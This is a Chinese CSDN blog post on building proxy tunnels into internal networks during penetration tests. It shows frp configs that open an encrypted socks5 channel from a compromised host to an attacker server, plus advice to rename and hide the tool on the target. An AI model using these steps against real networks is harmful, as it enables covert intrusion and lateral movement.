实战中内网穿透的打法

本文总结了内网渗透中不同网络环境下的代理穿透方法,包括目标出网时使用Frp和CobaltStrike建立socks代理,目标不出网时利用reGeorg、冰蝎和reduh进行http代理,以及面对隔离网络如何构建多级代理。重点介绍了各种工具的配置和加密策略,以确保通道的安全和隐蔽。
摘要由CSDN通过智能技术生成

前言

在内网渗透时,一个WebShell或CobaltStrike、Metasploit上线等,只是开端,更多是要内网横向移动,扩大战果,打到核心区域。但后渗透的前提是需要搭建一条通向内网的“专属通道”,才能进一步攻击。可实战中因为网络环境不同,所利用的方式就不同。

以下为自我总结“实战中内网穿透的打法”思维导图:

目标出网(socks代理)

这是实战中最愿意碰到的网络环境,目标机可以正常访问互联网,可直接在目标机挂socks代理或CobaltStrike上线,打通目标的内网通道。

Frp(socks5)

Frp服务端配置文件:

1
[common]
2
bind_port = 8080

Frp客户端配置文件:

1
[common]
2
server_addr = xx.xx.xx.xx
3
server_port = 8080
4
#服务端口使用Web常见端口
5
6
[socks5]
7
type = tcp
8
remote_port = 8088
9
plugin = socks5
10
use_encryption = true 
11
use_compression = true
12
#socks5口令
13
#plugin_user = SuperMan
14
#plugin_passwd = XpO2McWe6nj3

此处添加了加密压缩这两个功能,默认是不开启的,根据作者介绍,压缩算法使用的是 snappy。

use_encryption = true 启用加密 [通信内容加密传输,有效防止流量被拦截]

use_compression = true 启用压缩 [传输内容进行压缩,有效减小传输的网络流量,加快流量转发速度,但会额外消耗一些CPU资源]

use_encryption = true 、use_compression = true 必须放在相关协议下面。

frp客户端与配置文件传到目标机后,把程序名与配置文件进行修改,并放在系统相关文件夹中,做到隐蔽。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值